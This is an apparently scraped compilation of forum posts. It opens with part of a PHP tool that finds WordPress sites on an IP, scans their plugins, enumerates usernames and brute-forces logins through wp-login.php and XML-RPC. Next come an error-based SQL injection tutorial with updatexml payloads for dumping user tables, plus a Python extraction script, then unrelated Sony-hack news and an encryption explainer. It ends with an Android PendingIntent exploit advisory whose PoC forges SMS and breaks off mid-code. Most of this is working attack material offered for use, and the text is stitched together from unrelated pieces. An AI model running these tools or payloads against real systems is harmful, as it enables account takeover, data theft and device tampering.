        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
        $result = curl_exec($ch);
        curl_close($ch);
        if(!preg_match('|<link rel="pingback" href="(.*?)" />|', $result, $url)){ continue; }
        $wpurl = str_replace("xmlrpc.php", "", $url[1]);
        $fp = fopen('wp.txt', "a+");
        fputs($fp, $wpurl."\n");
        fclose($fp);
    }
    $lines = file('wp.txt');
    $lines = array_unique($lines);
    file_put_contents('wp.txt', implode($lines));
}

function xp_scanner($target, $list, $key = NULL){
    ##########################################################
    ##  PLUGINS AND THEMES SCANNER SECOND/PUBLIC VERSION    ##
    ##########################################################
    ##  LIST FORMAT: NAME:PATH:KEYWORD                      ##
    ##  EXAMPLE: xp:wp-content/plugins/xp/xp.php:Group-XP   ##
    ##########################################################
    ##  NAME IS REQUIRED                                    ##
    ##  PATH IS REQUIRED                                    ##
    ##  KEYWORD IS OPTIONAL (?)                             ##
    ##########################################################
    $file = file_get_contents($list);
    $plugins = explode("\n", $file);
    $target = rtrim(trim($target), '/');
    #print "\n\n[ Testing $target with ".count($plugins)." Plugins/Themes ]\n";
    if($key == NULL){
        foreach($plugins as $plugin){
            #####################
            ##  GET HEADERS    ##
            #####################
            $x = explode(":", trim($plugin));
            if(count($x) < 2){ continue; }
            $url = $target.'/'.$x[1];   # was reassigning $target, so each path was appended to the previous one
            $check = @get_headers($url);
            if($check && preg_match("/ 200 /", $check[0])){
                ####################
                ##  PLUGIN FOUND  ##
                ####################
                print "\n\t[!] FOUND $x[0] -> $url";
                /*
                #############
                ## SAVE IT ##
                #############
                $data = $url." -> ".$x[0]."\n";
                $fp = fopen('vuln.txt', "a+");
                fputs($fp, $data);
                fclose($fp);
                */
            }#else { print "\n\t[-] NOT FOUND $x[0] -> $url"; }
        }
    }else{
        foreach($plugins as $plugin){
            #####################
            ##  GET KEYWORD    ##
            #####################
            $x = explode(":", trim($plugin));
            if(count($x) < 3){ continue; }   # keyword mode needs the third field
            $url = $target.'/'.$x[1];
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
            $result = curl_exec($ch);
            curl_close($ch);
            if(preg_match("#".preg_quote($x[2], "#")."#", $result)){
                ####################
                ##  PLUGIN FOUND  ##
                ####################
                print "\n\t[!] FOUND $x[0] -> $url";
                /*
                #############
                ## SAVE IT ##
                #############
                $data = $url." -> ".$x[0]."\n";
                $fp = fopen('vuln.txt', "a+");
                fputs($fp, $data);
                fclose($fp);
                */
            }#else { print "\n\t[-] NOT FOUND $x[0] -> $url"; }
        }
    }
}

function xp_get_plugins($target){
    #########################
    ##  GET ALL PLUGINS    ##
    #########################
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
    $result = curl_exec($ch);
    curl_close($ch);
    preg_match_all("#/plugins/(.*?)/#i", $result, $plugin);
    $plugins = array_unique($plugin[1]);
    #if(count($plugins)==0){ print "No Plugin was found."; }
    foreach($plugins as $found){
        #################
        ##  SEARCH IT  ##
        #################
        xp_scanner_db($target, $found);
    }
}

function xp_get_themes($target){
    #########################
    ##  GET ALL THEMES     ##
    #########################
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
    $result = curl_exec($ch);
    curl_close($ch);
    preg_match_all("#/wp-content/themes/(.*?)/#i", $result, $theme);
    $themes = array_unique($theme[1]);
    #if(count($themes)==0){ print "No Theme was found."; }
    foreach($themes as $found){
        #################
        ##  SEARCH IT  ##
        #################
        xp_scanner_db($target, $found);
    }
}

function xp_scanner_db($target, $plugin){
    #######################################################################
    ##  PLUGINS SCANNER USING ONLINE SECURITY DBS FIRST/PUBLIC VERSION   ##
    #######################################################################
    ##  THIS VERSION ONLY CHECKS                                         ##
    ##  - WORDPRESSEXPLOIT.COM                                           ##
    ##  - EXPLOIT-DB.COM  (listed by the author, but only the first URL  ##
    ##                     is actually queried below)                    ##
    #######################################################################
    $wpexploit = "http://www.wordpressexploit.com/";   # was an array, which CURLOPT_URL does not accept
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $wpexploit);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
    $result = curl_exec($ch);
    curl_close($ch);
    if(preg_match("#".preg_quote($plugin, "#")."#", $result)){
        ##############
        ##  GOTCHA  ##
        ##############
        //print "\n\t$target -> seems to have a vulnerable plugin which is $plugin\n";
        ###############
        ##  SAVE IT  ##
        ###############
        $data = "\n[!] $target -> seems to have a vulnerable plugin which is [ $plugin ]";
        $fp = fopen('vulpl.txt', "a+");
        fputs($fp, $data."\n");
        fclose($fp);
    }
}

function xp_get_user($target, $list, $xmlrpc = NULL){
    ####################################
    ##  GET WORDPRESS USERNAME        ##
    ##  A SIMPLE ONE BUT WORTH A SHOT ##
    ####################################
    ## /?author=1 REDIRECTS TO THE FIRST AUTHOR'S ARCHIVE; THE NAME IS TAKEN FROM <title>
    $user = trim($target)."/?author=1";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $user);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
    $result = curl_exec($ch);
    curl_close($ch);
    if(!preg_match('#<title>(.*?)</title>#', $result, $username)){
        print "\n[!] Couldn't find a username for $target\n";
        return;
    }
    $account = explode('|', $username[1]);
    if($xmlrpc == NULL){
        ###########################################################
        ##  START BRUTE FORCE WITH THE ADMIN ACCOUNT / NORMAL BF ##
        ###########################################################
        return xp_brute($target, $account[0], $list);
    }else{
        ###########################################################
        ##  START BRUTE FORCE VIA XMLRPC WITH THE ADMIN ACCOUNT  ##
        ###########################################################
        return xp_brute_xmlrpc($target, $account[0], $list);
    }
}

function xp_brute($target, $user, $list){
    ###########################################
    ##  BRUTE FORCE PUBLIC/FIRST VERSION     ##
    ###########################################
    ##  PASSWORDS LIST FORMAT: PASSWORD\n    ##
    ##  EXAMPLE: 12345\np4ssw0rd             ##
    ##  ( \n = NEW LINE )                    ##
    ###########################################
    $file = file_get_contents($list);
    $passwords = explode("\n", $file);
    $target = trim($target);
    $user = trim($user);
    print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
    foreach($passwords as $password){
        #############################
        ##  TESTING EACH PASSWORD  ##
        #############################
        $password = trim($password);
        $redirect = $target."/wp-admin/";   # was $taregt (typo), which left the redirect empty
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $target."/wp-login.php");
        curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_TIMEOUT, 10);
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd()."/wp-cookie.txt");
        curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd()."/wp-cookie.txt");
        # the original urlencode()d the whole tail into the wp-submit value; encode each field instead
        $post = http_build_query(array(
            'log'         => $user,
            'pwd'         => $password,
            'rememberme'  => 'forever',
            'wp-submit'   => 'Log In',
            'redirect_to' => $redirect,
            'testcookie'  => '1',
        ));
        curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
        $result = curl_exec($curl);
        curl_close($curl);
        ##########################
        ##  CHECK IF IT WORKED  ##
        ##########################
        ## 'tab-panel-overview' ONLY APPEARS ON THE LOGGED-IN DASHBOARD
        if(strstr($result, 'tab-panel-overview')){
            print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
            ###############
            ##  SAVE IT  ##
            ###############
            $data = "\n[!] Cracked $target -> [ $user:$password ]";
            $fp = fopen('cracked.txt', "a+");
            fputs($fp, $data."\n");
            fclose($fp);
            break;
        }#else{ print "\n[+] Trying $user:$password"; }
    }
}

function xp_check_xmlrpc($target){
    $target = $target."/xmlrpc.php";
    $check = @get_headers($target);
    if($check && preg_match("/ 200 /", $check[0])){   # eregi() was removed in PHP 7
        return 1;
    }else{
        return 0;
    }
}

function xp_brute_xmlrpc($target, $user, $list){
    ######################################################
    ##  BRUTE FORCE VIA XMLRPC PUBLIC/FIRST VERSION     ##
    ######################################################
    ##  PASSWORDS LIST FORMAT: PASSWORD\n               ##
    ##  EXAMPLE: 12345\np4ssw0rd                        ##
    ##  ( \n = NEW LINE )                               ##
    ######################################################
    $target = trim($target);
    $user = trim($user);
    if(xp_check_xmlrpc($target) != 1){
        print "\n[!] Couldn't find xmlrpc.php in $target\n";
        return;   # was 'break', which is invalid outside a loop
    }
    $file = file_get_contents($list);
    $passwords = explode("\n", $file);
    print "\n\n[ Testing $target ($user) with (".count($passwords).") Passwords ]\n";
    foreach($passwords as $password){
        $password = trim($password);
        $headers = array('Content-Type: application/x-www-form-urlencoded');
        $isadmin = '<name>isAdmin</name>';   # wp.getUsersBlogs only returns this for valid credentials
        #############################
        ##  TESTING EACH PASSWORD  ##
        #############################
        $data = "
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value><string>".htmlspecialchars($user, ENT_XML1)."</string></value></param>
    <param><value><string>".htmlspecialchars($password, ENT_XML1)."</string></value></param>
  </params>
</methodCall>
";
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $target."/xmlrpc.php");
        curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
        curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($curl, CURLOPT_TIMEOUT, 10);
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($curl, CURLOPT_COOKIEJAR, getcwd()."/wp-cookie.txt");
        curl_setopt($curl, CURLOPT_COOKIEFILE, getcwd()."/wp-cookie.txt");
        curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
        $result = curl_exec($curl);
        curl_close($curl);
        ##########################
        ##  CHECK IF IT WORKED  ##
        ##########################
        if(strstr($result, $isadmin)){
            print "\n\t[!] Cracked $target -> [ $user:$password ]\n";
            ###############
            ##  SAVE IT  ##
            ###############
            $data = "\n[!] Cracked $target -> [ $user:$password ]";
            $fp = fopen('cracked.txt', "a+");
            fputs($fp, $data."\n");
            fclose($fp);
            break;
        }#else{ print "\n[+] Trying $user:$password"; }
    }
}

function bye(){
    ########################
    ##  DONE/SAY GOODBYE  ##
    ########################
    print "\n\n[+] DONE!\n[-] EXITING.\n\n";
    ######################
    ##  DELETE LOG FILES ##
    ###################################################################
    ##  NOTE: YOU CAN REMOVE THIS TO HAVE MORE INFO ABOUT THE TARGET! ##
    ###################################################################
    @unlink('sites.txt');
    @unlink('wp-sites.txt');
    @unlink('wp.txt');
    @unlink('vuln.txt');
    @unlink('cracked.txt');
    exit(2);
}

############################
##  COMMAND LINE'S SHIT   ##
############################
clear();
noblackhat();
################################################
##  MAKE SURE IT RUNS ONLY FROM COMMAND LINE  ##
################################################
if( strtolower(php_sapi_name()) != 'cli' ) {
    printf("%s\n", "Please run only from command line interface.");
    exit;
}
clear();
banner();
print "\nIP-Address # ";
$target = trim(fgets(STDIN));
# the original had this check commented out (and misspelled the variable), so it never ran
if(!filter_var($target, FILTER_VALIDATE_IP)){ die("\nError: Not a valid IP.\n\n"); }
##############################
##  DELETE OLD LOG FILES    ##
##############################
@unlink('sites.txt');
@unlink('wp-sites.txt');
@unlink('wp.txt');
@unlink('vuln.txt');
@unlink('cracked.txt');
@unlink('vulpl.txt');
#############################
##  CREATE THE LOG FILES   ##
#############################
$log1 = fopen("sites.txt", "w");    fclose($log1);
$log2 = fopen("wp-sites.txt", "w"); fclose($log2);
$log3 = fopen("wp.txt", "w");       fclose($log3);
$log4 = fopen("vuln.txt", "w");     fclose($log4);
$log5 = fopen("cracked.txt", "w");  fclose($log5);
$log6 = fopen("vulpl.txt", "w");    fclose($log6);
###############################
##  SHIT IS GETTIN' REAL =P  ##
###############################
print "\nDORK [or simply leave it empty] # ";
$dork = trim(fgets(STDIN));
print "\n[+] Getting the server's sites";
if($dork == ""){
    #########################
    ##  IF DORK WAS EMPTY  ##
    #########################
    bing_it("ip:$target");
    bing_it("ip:".$target." /page_id=");
    bing_it("ip:".$target." Wordpress");
    bing_it("ip:".$target." blog");
}else{
    ###########################
    ##  USE THE USER'S DORK  ##
    ###########################
    bing_it("ip:".$target." ".$dork);
}
#print "\n[-] Got'em";sleep(1);
print "\n[+] Separating the sites";
wp('sites.txt');
#print "\n[-] We got the sites, which are using WordPress";sleep(1);
wp_em('wp-sites.txt');
#################
##  Results    ##
#################
print "\n[+] Finished, these are the website/s that I found:\n";
$wplist = file_get_contents('wp.txt');
$get = explode("\n", $wplist);
#print "[ ".count($get)." Website ]\n"; // empty lines will be counted
foreach($get as $hk){
    if($hk !== ""){
        print "\n\t[!] $hk";
    }
}
###########################
##  GIVE ME AN OPTION    ##
###########################
print "\n\n\n[1] PLUGINS/THEMES SCANNER. (FROM A LIST)\n[2] PLUGINS/THEMES SCANNER. (FROM A SECURITY DBS)\n[3] BRUTE FORCE.\n[4] EXIT/QUIT.\n\n";
print "\nWHAT WOULD YOU LIKE TO DO ? [1,2,3,4] : ";
$what = trim(fgets(STDIN));
$choice = array("1", "2", "3", "4");
$yesno = array("y", "yes");
if(in_array($what, $choice)){
    if($what == "1"){
        print "\nNP, WHERE IS YOUR LIST FOR PLUGINS/THEMES? [ex: hk.txt] : ";
        $list = trim(fgets(STDIN));
        if(!is_file($list)) {
            #######################
            ##  CAN'T LOAD LIST  ##
            #######################
            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
            ##############
            ##  EXIT    ##
            ##############
            bye();
        }
        #################
        ##  POOYAA!    ##
        #################
        print "\n[+] Scanning begun";
        $file = file_get_contents($list);
        $plugins = explode("\n", $file);
        print "\n[-] [".count($plugins)."] Plugins/Themes have been loaded\n";
        $targets = file_get_contents('wp.txt');
        $r00t3rz = explode("\n", $targets);
        print "\nWant to use a keyword (or use headers respond) ? [Y/n]: ";
        $key = strtolower(trim(fgets(STDIN)));
        if(in_array($key, $yesno)){
            $key = "set";
        }else{
            $key = NULL;
        }
        foreach($r00t3rz as $z){
            if($z !== ""){
                xp_scanner($z, $list, $key);
            }
        }
        /*
        #################
        ##  Results    ##
        #################
        print "\n[+] Scanning finished!";
        $vul = file_get_contents('vuln.txt');
        $able = explode("\n", $vul);
        print '[ '.count($able).' Website ]\n';
        foreach($able as $gxp){
            if($gxp !== ""){
                print "\n\t[!] $gxp";
            }
        }
        */
        bye();
    } elseif($what == "2") {
        print "\nPLUGINS/THEMES SCANNER USING ONLINE SECURITY DBS\n\n";
        #################
        ##  POOYAA!    ##
        #################
        print "\n[+] Scanning begun";
        $targets = file_get_contents('wp.txt');
        $r00t3rz = explode("\n", $targets);
        foreach($r00t3rz as $z){
            if($z !== ""){
                xp_get_plugins($z);
                xp_get_themes($z);
            }
        }
        #################
        ##  Results    ##
        #################
        print "\n[+] Finished, these are the websites that have a vulnerable plugin/s:\n";
        $vulpl = file_get_contents('vulpl.txt');
        $getpl = explode("\n", $vulpl);
        #print "[ ".count($getpl)." Website ]\n"; // empty lines will be counted
        foreach($getpl as $vul){
            if($vul !== ""){
                print "\n\t$vul";
            }
        }
        bye();
    } elseif($what == "3") {
        print "\nNP, WHERE IS YOUR PASSWORDS LIST? [ex: hk.txt] : ";
        $list = trim(fgets(STDIN));
        if(!is_file($list)) {
            #######################
            ##  CAN'T LOAD LIST  ##
            #######################
            print "\nERROR! WHILE LOADING THE LIST FILE\n\n";
            ##############
            ##  EXIT    ##
            ##############
            bye();
        }
        #################
        ##  POOYAA!    ##
        #################
        print "\nWANT TO BRUTEFORCE VIA XMLRPC ? [Y/n]: ";
        $xmlrpc = strtolower(trim(fgets(STDIN)));
        if(in_array($xmlrpc, $yesno)){
            $xml = "set";
        }else{
            $xml = NULL;
        }
        print "\n[+] Bruting begun";
        $targets = file_get_contents('wp.txt');
        $xp = explode("\n", $targets);
        foreach($xp as $z){
            if($z !== ""){
                xp_get_user($z, $list, $xml);
            }
        }
        bye();
    } else {
        ######################
        ##  OOH KILL'EM =P  ##
        ######################
        bye();
    }
}
#####################################
##  © ALM3REFH.COM 2014 - CHEERS!  ##
#####################################
?>
```
  17. Credits to: Diku

The "ExtractValue" function in MySQL runs an XPath query against a string representing XML data. The function takes input in the following form:

    UPDATEXML(XMLType_Instance, XPath_string, value_expression, namespace_string)

If the XPath query is syntactically incorrect, we are presented with an error message:

    XPATH syntax error: 'xpathqueryhere'

We use it under the same conditions as other error-based injections, but sometimes, if ExtractValue is not available or is filtered by the firewall, we can use this one.

When we try the union-based first step and do not get any output, we can try using error-based injection. For example, we used the query below and got no output:

    www.vuln-web.com/index.php?view=-35" union select 1,2,3,4,5--

As you can see the double quote over there... that means this time we are injecting into a string-type query. Now we can easily assume the internal query:

    Query: select path from pages where view="<our_input_here>" limit 1,1;

So let us continue our injection using XPATH updateXML injection:

    www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(OUR QUERY HERE)),null)--

Getting the current database:

    www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select database())),null)--

Output: XPATH syntax error: ':database_name_here'

As we got the database, let us continue.

Getting tables in the current database:

    www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),null)--

Output: XPATH syntax error: ':table_name_here'

As you can see I used limit, as we cannot extract long data: the error message is limited to 32 characters. So I prefer to go one by one, increasing the row offset to get the output. Well, if you want to dump the database, go for any tool or manual proxy, or else create your own script to get the data dumped for you, which I consider the best option.
So now let's assume we got the following tables using the above query:

    Posts
    Assets
    Banner
    Links
    Users

Let us continue and try to get the columns:

    www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1)),null)--

Output: XPATH syntax error: ':column_name_here'

Let us say we got the 3 columns:

    id
    username
    password

Let us dump the data from them, but before that let's count the number of rows.

Counting the number of rows:

    www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select count(username) from users)),null)--

You can use the same trick to count the tables or columns as well.

So now let us continue dumping the data:

    www.vuln-web.com/index.php?view=-35" and updatexml(null,concat(0x3a,(select concat(username,0x3a,password) from users limit 0,1)),null)--

Output: XPATH syntax error: ':Output_here'
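The script the post recommends writing, as an added example (it is not part of the original post and not Diku's code). It automates the updatexml() queries above and works around the 32-character limit of the XPATH error by reading each value through substring() in 31-character pieces (the 0x3a marker takes the 32nd character), walking rows with LIMIT until a row comes back NULL, which produces no error at all. Everything target-side is constructed: make_mock_target() is an offline stand-in for the vulnerable page that evaluates the inner SELECT with SQLite (with a registered concat() and MySQL hex literals translated), so database() and information_schema are not available against it, only the chunking and row-walking logic is exercised. Against a real target, replace send() with a function that requests index.php?view=<param> and returns the body.

```python
import re
import sqlite3

# The MySQL error we abuse; the leading ':' is our 0x3a marker. MySQL shows at
# most 32 characters of the bad XPath string, so 31 characters of data per request.
ERR_RE = re.compile(r"XPATH syntax error: ':([^']*)'")
CHUNK = 31


def build_payload(subquery, offset, length=CHUNK):
    """Same shape as the post's payloads, plus substring() for chunked reads."""
    return ('-35" and updatexml(null,concat(0x3a,substring((%s),%d,%d)),null)-- '
            % (subquery, offset, length))


def extract(send, subquery):
    """Read one scalar result of `subquery` through the XPATH error.
    Returns None when the page answers without the error (NULL result / no row).
    Values containing a single quote would be cut short by ERR_RE."""
    out, offset = "", 1
    while True:
        m = ERR_RE.search(send(build_payload(subquery, offset)))
        if m is None:
            return None if offset == 1 else out
        out += m.group(1)
        if len(m.group(1)) < CHUNK:      # short piece means the value ended
            return out
        offset += CHUNK


def dump(send, row_query, max_rows=100):
    """row_query holds '{row}' where the LIMIT offset goes; stops at the first NULL row."""
    rows = []
    for i in range(max_rows):
        value = extract(send, row_query.format(row=i))
        if value is None:
            break
        rows.append(value)
    return rows


# --- Offline stand-in for the vulnerable page (constructed for this example) ---
_WRAP_RE = re.compile(r"substring\(\((.*)\),(\d+),(\d+)\)\),null\)", re.S)
_HEX_RE = re.compile(r"0x([0-9a-fA-F]+)")


def make_mock_target():
    """Imitates the MySQL behaviour the attack relies on: hex literals are strings,
    concat() of a NULL is NULL (so no error), and the error echoes 32 characters."""
    db = sqlite3.connect(":memory:")
    db.create_function("concat", -1, lambda *a: None if any(x is None for x in a)
                       else "".join(str(x) for x in a))
    db.execute("create table users(id integer, username text, password text)")
    db.executemany("insert into users values(?,?,?)", [
        (1, "admin", "0123456789abcdef0123456789abcdef"),   # constructed 32-char hash
        (2, "bob", "secret"),
    ])

    def send(view_param):
        m = _WRAP_RE.search(view_param)
        if m is None:
            return "<html>normal page</html>"
        inner = _HEX_RE.sub(lambda h: "'" + bytes.fromhex(h.group(1)).decode() + "'",
                            m.group(1))
        row = db.execute(inner).fetchone()
        if row is None or row[0] is None:
            return "<html>normal page</html>"
        start, length = int(m.group(2)) - 1, int(m.group(3))
        xpath = (":" + str(row[0])[start:start + length])[:32]
        return "<html>XPATH syntax error: '%s'</html>" % xpath

    return send


if __name__ == "__main__":
    target = make_mock_target()
    print("rows:", extract(target, "select count(username) from users"))
    for line in dump(target, "select concat(username,0x3a,password) from users limit {row},1"):
        print(line)
```

The admin row is 38 characters long, so it costs two requests; the loop stops at the third row because concat() of a missing row is NULL and the page then renders normally instead of erroring.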
  18. SONY PICTURES is still coming to terms with the hacker assault on its services, and is experiencing problems with its communications systems. The firm has not yet responded to our requests for information, but its web server has. The email system has responded to two of our questions, the first saying that it was struggling to receive messages, and the second to alert us to "disruption" at its end. There is some good news for Sony, as the information referred to in the hack has not yet been released. Sony lost control of its desktops, phone lines and perhaps a whack of data at the hands of a hacker and the Twitter tag #GOP on Monday. Reports claim that the firm has been brought to its knees by a hacker who has threatened to release information that Sony Pictures would perhaps rather not have shared. The company has admitted that it is looking into "an IT matter", but the screenshot being shown online (above) suggests that the hacker has serious intentions. The message reads: 'Hacked By #GOP. Warning: We've already warned you, and this is just a beginning. We continue till our request be met. 'Below the message is a collection of links claiming to be internal Sony Pictures information relating to something called SPED. The meaning of SPED is unclear, but it suggests that the information does not relate to Sony's PlayStation, which comes under the SCEE banner internally. GOP may stand for Guardians of Peace, but we have been unable to confirm this. We are downloading one of the ZIP files linked to on the original message. A Sony Pictures spokesperson told the US Deadline website that something was going on, but said only: Anecdotal reports online say that Sony has reverted to pens and paper, and presumably bartering and raising livestock, as it comes to terms with a lack of access to Twitter. A collection of movie type accounts have been plunged into the wilderness, and there is a lack of access to office basics like email. 
The motive is currently unclear but the suggestion is that someone, maybe an ex-employee, has a grudge against Sony Pictures. Source
  19. Plenty of companies brag that their communications app is encrypted. But that marketing claim demands a followup question: Who has the key? In many cases, the company itself holds the cryptographic key data that lets it decrypt your messages—and so, therefore, does any hacker who compromises the company or government official standing over its shoulder. But increasingly, privacy-conscious communications tools are rolling out a feature known as “end-to-end encryption.” That “end-to-end” promise means that messages are encrypted in a way that allows only the unique recipient of a message to decrypt it, and not anyone in between. In other words, only the endpoint computers hold the cryptographic keys, and the company’s server acts as an illiterate messenger, passing along messages that it can’t itself decipher. That notion of the decryption key never leaving the user’s device might seem like a paradox. If the company’s server can never see the key, then how does it get onto the device when the user installs the app in the first place? The answer is possible because of another crypto trick known as public-key encryption. In public key crypto systems, a program on your computer mathematically generates a pair of keys. One, called the private key or secret key, is used for decrypting messages sent to you and never leaves your device. The other, called the public key, is used for encrypting messages that are sent to you, and it’s designed so that only the corresponding private key can decrypt those messages. That key can be shared with anyone who wants to encrypt a message to you. Think of the system like a lockbox on your doorstep for the UPS delivery man: anyone with your public key can put something in the box and lock it, but only you have the private key to unlock it. The first free, widely used end-to-end encrypted messaging software was PGP, or Pretty Good Privacy, a program coded by Phil Zimmermann and released in 1991. 
But it’s taken decades for that complete encryption tunnel to reach the masses. Programs like the “Off The Record” plugin for Jabber instant-messaging applications and TextSecure for text messaging have made end-to-end encryption far easier to use. Apple uses a form of end-to-end encryption in its iMessage app. (Though some security researchers have pointed to flaws in its implementation that might allow its messages to be decrypted.) Google is experimenting with an end-to-end encryption email plugin for Chrome. And just last week smartphone messaging app Whatsapp integrated TextSecure into its Android software, turning on end-to-end encryption for hundreds of millions of users.

Even end-to-end encryption isn’t necessarily impervious to snooping. Rather than try to actually break the encryption, for instance, an eavesdropper may try to impersonate a message recipient so that messages are encrypted to their public key instead of the one the sender intended. After decrypting the message, the snoop can then encrypt it to the recipient’s actual public key and send it on again to avoid detection; this is what’s known as a man-in-the-middle attack. To combat that tactic, some end-to-end encryption programs generate unique one-time strings of characters based on the two users’ public keys. The two people communicating read out that passphrase to each other before starting their conversation. If the characters match, they can be reassured there’s no man in the middle.

Of course, there are still two vulnerable points left in even perfect end-to-end encryption systems: the ends. Each user’s computer can still be hacked to steal his or her cryptographic key or simply read the recipient’s decrypted messages. Even the most perfectly encrypted communication pipe is only as secure as the mailbox on the other end.

Hacker Lexicon is WIRED’s explainer series that seeks to de-mystify the jargon of information security, surveillance and privacy. Source
  20. INTRODUCTION
==================================
In Android <5.0 (and maybe >= 4.0), the Settings application leaks a PendingIntent with a blank base intent (neither the component nor the action is explicitly set) to third-party applications. A bad app can use this to broadcast intents with the same permissions and identity as the Settings application, which runs as the SYSTEM uid. Thus a bad app can broadcast sensitive intents with the permissions of SYSTEM.

DETAILS
==================================
The vulnerability exists in AddAccountSettings.java in the Settings app:
https://android.googlesource.com/platform/packages/apps/Settings/+/android-4.4.4_r2.0.1/src/com/android/settings/accounts/AddAccountSettings.java

In the method addAccount, a PendingIntent is created by getBroadcast; the problem is that neither the action nor the component is explicitly set:

    private void addAccount(String accountType) {
        Bundle addAccountOptions = new Bundle();
        mPendingIntent = PendingIntent.getBroadcast(this, 0, new Intent(), 0);
        addAccountOptions.putParcelable(KEY_CALLER_IDENTITY, mPendingIntent);
        addAccountOptions.putBoolean(EXTRA_HAS_MULTIPLE_USERS, Utils.hasMultipleUsers(this));
        AccountManager.get(this).addAccount(
                accountType,
                null, /* authTokenType */
                null, /* requiredFeatures */
                addAccountOptions,
                null,
                mCallback,
                null /* handler */);
        mAddAccountCalled = true;
    }

This PendingIntent is then stored in addAccountOptions, which is sent to another application. According to the Android developer guides, this is not secure (see http://developer.android.com/reference/android/app/PendingIntent.html):

"By giving a PendingIntent to another application, you are granting it the right to perform the operation you have specified as if the other application was yourself (with the same permissions and identity). As such, you should be careful about how you build the PendingIntent: almost always, for example, the base Intent you supply should have the component name explicitly set to one of your own components, to ensure it is ultimately sent there and nowhere else."

The bad app can register as an account authenticator by writing a service with the following intent filter (no permission is needed):

    <intent-filter>
        <action android:name="android.accounts.AccountAuthenticator" />
    </intent-filter>

Then the bad app can send an intent to the Settings app and request that it add an account of the requested account type:

    Intent intent = new Intent();
    intent.setComponent(new ComponentName("com.android.settings",
            "com.android.settings.accounts.AddAccountSettings"));
    intent.setAction(Intent.ACTION_RUN);
    intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
    String authTypes[] = {AccountGeneral.ACCOUNT_TYPE};
    intent.putExtra("account_types", authTypes);
    startActivity(intent);

Upon receiving such an intent, the Settings app will (automatically) call the method addAccount (whose vulnerability is explained above) and send the PendingIntent to the bad app's addAccount method. Since the PendingIntent's action and component are blank, the bad app can fill in an arbitrary action and extras and resend this pending intent with the permissions of SYSTEM. For example, the bad app can create a phishing SMS on the phone with the following POC:

    public Bundle addAccount(AccountAuthenticatorResponse response, String accountType,
            String authTokenType, String[] requiredFeatures, Bundle options)
            throws NetworkErrorException {
        ...
        PendingIntent pendingIntent = (PendingIntent) options.getParcelable("pendingIntent");
        Intent newIntent = new Intent();
        newIntent.setAction("android.provider.Telephony.SMS_RECEIVED");
        // filling phishing sms pdu data
        newIntent.putExtra("pdus", new Object[] { pdu });
        newIntent.putExtra("format", "3gpp");
        try {
            pendingIntent.send(mContext, 0, newIntent, null, null);
        } catch (CanceledException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

Or force the phone to factory reset to delete the user's data with the following POC:

    public Bundle addAccount(AccountAuthenticatorResponse response, String accountType,
            String authTokenType, String[] requiredFeatures, Bundle options)
